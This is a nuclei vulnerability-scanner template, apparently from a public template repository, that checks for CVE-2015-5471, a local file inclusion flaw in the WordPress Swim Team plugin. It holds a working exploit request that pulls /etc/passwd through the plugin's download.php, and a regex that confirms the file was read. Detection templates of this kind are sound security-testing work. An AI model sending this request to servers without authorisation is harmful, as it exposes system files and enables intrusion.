nuclei-templates/cves/2015/CVE-2015-5471.yaml

24 lines
621 B
YAML
Raw Normal View History

2021-10-25 23:04:56 +00:00
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: high
reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
2021-10-26 09:43:55 +00:00
tags: cve,cve2015,wordpress,wp-plugin,lfi
2021-10-25 23:04:56 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200